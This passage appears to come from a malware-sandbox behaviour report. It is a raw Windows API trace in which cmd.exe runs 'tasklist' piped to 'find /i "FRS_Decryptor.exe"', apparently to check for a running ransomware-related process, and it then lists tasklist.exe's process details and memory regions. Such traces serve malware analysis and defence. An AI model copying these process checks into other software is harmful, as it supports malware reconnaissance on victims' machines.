hStdError=0x2c)) [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0104.081] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0104.081] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0104.082] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8f3f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8f444 | out: lpCommandLine="tasklist", lpProcessInformation=0xc8f444*(hProcess=0x64, hThread=0x60, dwProcessId=0x8f4, dwThreadId=0x610)) returned 1 [0104.086] CloseHandle (hObject=0x60) returned 1 [0104.086] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0104.086] GetEnvironmentStringsW () returned 0xe142d8* [0104.086] FreeEnvironmentStringsA (penv="=") returned 1 [0104.086] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8f470 | out: lpAttributeList=0xc8f470) [0104.086] _get_osfhandle (_FileHandle=3) returned 0x54 [0104.086] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0104.086] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0104.086] _close (_FileHandle=5) returned 0 [0104.086] _dup (_FileHandle=0) returned 4 [0104.086] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0104.086] _close (_FileHandle=3) returned 0 [0104.086] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0104.086] SetErrorMode (uMode=0x0) returned 0x0 [0104.086] SetErrorMode (uMode=0x1) returned 0x0 [0104.086] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe142e0, lpFilePart=0xc8f514 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8f514*="Desktop") returned 0x1c [0104.086] SetErrorMode (uMode=0x0) returned 0x1 [0104.086] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0104.087] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.087] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.087] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.087] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xc8f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f2a0) returned 0xffffffff [0104.087] GetLastError () returned 0x2 [0104.087] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.087] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xc8f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f2a0) returned 0xe15628 [0104.087] FindClose (in: hFindFile=0xe15628 | out: hFindFile=0xe15628) returned 1 [0104.087] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xc8f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f2a0) returned 0xffffffff [0104.087] GetLastError () returned 0x2 [0104.087] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8f2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f2a0) returned 0xe15628 [0104.087] FindClose (in: hFindFile=0xe15628 | out: hFindFile=0xe15628) returned 1 [0104.087] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0104.087] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0104.087] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0104.087] SetErrorMode (uMode=0x0) returned 0x0 [0104.088] SetErrorMode (uMode=0x1) returned 0x0 [0104.088] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe14668, lpFilePart=0xc8f2bc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8f2bc*="Desktop") returned 0x1c [0104.088] SetErrorMode (uMode=0x0) returned 0x1 [0104.088] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0104.088] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0104.088] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0104.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.088] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xc8f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f048) returned 0xffffffff [0104.088] GetLastError () returned 0x2 [0104.088] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.088] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xc8f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f048) returned 0xe104a0 [0104.088] FindClose (in: hFindFile=0xe104a0 | out: hFindFile=0xe104a0) returned 1 [0104.088] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xc8f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f048) returned 0xffffffff [0104.089] GetLastError () returned 0x2 [0104.089] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8f048, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8f048) returned 0xe104a0 [0104.089] FindClose (in: hFindFile=0xe104a0 | out: hFindFile=0xe104a0) returned 1 [0104.089] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0104.089] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0104.089] GetConsoleTitleW (in: lpConsoleTitle=0xc8f544, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0104.089] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8f470, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8f454 | out: lpAttributeList=0xc8f470, lpSize=0xc8f454) returned 1 [0104.089] UpdateProcThreadAttribute (in: lpAttributeList=0xc8f470, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8f45c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8f470, lpPreviousValue=0x0) returned 1 [0104.089] GetStartupInfoW (in: lpStartupInfo=0xc8f4a8 | out: lpStartupInfo=0xc8f4a8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2b8, hStdError=0x2c)) [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.089] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0104.090] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0104.090] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0104.090] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8f3f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8f444 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xc8f444*(hProcess=0x60, hThread=0x54, dwProcessId=0x780, dwThreadId=0x47c)) returned 1 [0104.092] CloseHandle (hObject=0x54) returned 1 [0104.092] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0104.092] GetEnvironmentStringsW () returned 0xe1ad78* [0104.092] FreeEnvironmentStringsA (penv="=") returned 1 [0104.092] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8f470 | out: lpAttributeList=0xc8f470) [0104.092] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0104.092] _close (_FileHandle=4) returned 0 [0104.092] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0104.540] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xc8f7b8 | out: lpExitCode=0xc8f7b8*=0x0) returned 1 [0104.540] CloseHandle (hObject=0x64) returned 1 [0104.540] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0104.542] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xc8f7b8 | out: lpExitCode=0xc8f7b8*=0x0) returned 1 [0104.542] CloseHandle (hObject=0x60) returned 1 [0104.542] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0104.542] SetConsoleMode (hConsoleHandle=0x2b8, dwMode=0x0) returned 0 [0104.542] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0104.542] GetConsoleMode (in: hConsoleHandle=0x2b8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0104.542] _get_osfhandle (_FileHandle=0) returned 0x24 [0104.542] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0104.542] SetConsoleInputExeNameW () returned 0x1 [0104.542] GetConsoleOutputCP () returned 0x1b5 [0104.542] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0104.542] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.543] exit (_Code=0) Process: id = "99" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x6677000" os_pid = "0x8f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "98" os_parent_pid = "0x6c8" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5122 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 5123 start_va = 0x430000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 5124 start_va = 0x450000 end_va = 0x451fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5125 start_va = 0x460000 end_va = 0x46efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 5126 start_va = 0x470000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 5127 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 5128 start_va = 0x4f0000 end_va = 0x4f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 5129 start_va = 0x500000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 5130 start_va = 0x510000 end_va = 0x511fff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5131 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5132 start_va = 0x7edb0000 end_va = 0x7edd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edb0000" filename = "" Region: id = 5133 start_va = 0x7edd9000 end_va = 0x7edd9fff entry_point = 0x0 region_type = private name = "private_0x000000007edd9000" filename = "" Region: id = 5134 start_va = 0x7eddc000 end_va = 0x7eddefff entry_point = 0x0 region_type = private name = "private_0x000000007eddc000" filename = "" Region: id = 5135 start_va = 0x7eddf000 end_va = 0x7eddffff entry_point = 0x0 region_type = private name = "private_0x000000007eddf000" filename = "" Region: id = 5136 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5137 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5138 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5139 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5159 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 5160 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5161 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5162 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5167 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 5168 start_va = 0x440000 end_va = 0x443fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5169 start_va = 0x450000 end_va = 0x452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 5170 start_va = 0x520000 end_va = 0x59dfff entry_point = 0x520000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5171 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 5172 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 5173 start_va = 0x5d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5174 start_va = 0x5e0000 end_va = 0x5e3fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 5175 start_va = 0x5f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 5176 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 5177 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5178 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 5179 start_va = 0x700000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5180 start_va = 0x800000 end_va = 0x941fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 5181 start_va = 0x980000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 5182 start_va = 0x990000 end_va = 0xb17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 5183 start_va = 0xb20000 end_va = 0xca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 5184 start_va = 0xcb0000 end_va = 0x20affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 5185 start_va = 0x20b0000 end_va = 0x2384fff entry_point = 0x20b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5186 start_va = 0x2390000 end_va = 0x278bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002390000" filename = "" Region: id = 5187 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5188 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5189 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5190 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 5191 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5192 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5193 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5194 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" 